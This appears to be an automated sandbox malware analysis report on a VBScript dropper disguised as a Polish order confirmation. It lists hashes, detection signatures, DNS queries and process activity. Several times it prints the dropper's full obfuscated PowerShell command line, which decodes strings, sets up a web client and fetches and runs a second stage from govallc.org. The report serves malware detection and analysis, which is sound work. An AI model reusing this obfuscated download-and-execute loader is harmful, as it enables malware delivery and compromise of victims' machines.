Windows Analysis Report
MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs

Overview

General Information

Sample name: MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs
Analysis ID: 1533092
MD5: a74cf7fea2f317f537fadc3e2d34dee5
SHA1: 1df8410433bba83aa58596cd88a9c084a5a8e43a
SHA256: c0d20c1324c32ec11ee40a892c6ae0b954f6972e19ce9e976bcf565091f12cdd
Tags: vbsuser-Maciej8910871
Infos:

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Potential evasive VBS script found (sleep loop)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

AV Detection
barindex
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 98.8% probability
Source: Binary string: m.Core.pdb source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4CFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb@c source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4CCD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\System.pdb source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4CFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4D29000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *n.pdb source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4D29000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbN source: powershell.exe, 0000000B.00000002.2594834506.000002A2DD294000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000B.00000002.2570430275.000002A2C3142000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping aszzzw_6777.6777.6777.677e
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Source: unknown DNS traffic detected: query: aszzzw_6777.6777.6777.677e replaycode: Name error (3)
Source: unknown DNS traffic detected: query: govallc.org replaycode: Name error (3)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: aszzzw_6777.6777.6777.677e
Source: global traffic DNS traffic detected: DNS query: govallc.org
Source: powershell.exe, 0000000B.00000002.2591792743.000002A2D4F76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2591792743.000002A2D4E34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2571576679.000002A2C4FE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000002.2571576679.000002A2C4DC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.2571576679.000002A2C4FE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000B.00000002.2571576679.000002A2C4DC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.2591792743.000002A2D4E34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2591792743.000002A2D4E34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2591792743.000002A2D4E34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2571576679.000002A2C4FE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000B.00000002.2571576679.000002A2C6598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5C93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5F40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C56A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C6514000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C6360000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C66B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C6774000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5A10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5D57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C4FE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C543F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C63FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C65E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C69B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C52F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C6813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5E3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://govallc.org
Source: powershell.exe, 0000000B.00000002.2571576679.000002A2C4FE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://govallc.org/redningsblternes.asiP
Source: powershell.exe, 0000000B.00000002.2591792743.000002A2D4F76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2591792743.000002A2D4E34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe

System Summary
barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping aszzzw_6777.6777.6777.677e
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus 'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140 (Jus 'Terp$NeksT Gr,eLydss
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping aszzzw_6777.6777.6777.677e Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus 'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140 (Jus 'Terp$NeksT Gr,eLydss Jump to behavior
Java / VBScript file with very long strings (likely obfuscated code)
Source: MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs Initial sample: Strings found which are bigger than 50
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6250
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6250 Jump to behavior
Source: classification engine Classification label: mal88.troj.expl.evad.winVBS@9/3@17/0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Arkaiserings.Slg Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sa2gxs0x.djv.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping aszzzw_6777.6777.6777.677e
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping aszzzw_6777.6777.6777.677e
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus 'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140 (Jus 'Terp$NeksT Gr,eLydss
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping aszzzw_6777.6777.6777.677e Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus 'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140 (Jus 'Terp$NeksT Gr,eLydss Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping aszzzw_6777.6777.6777.677e Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
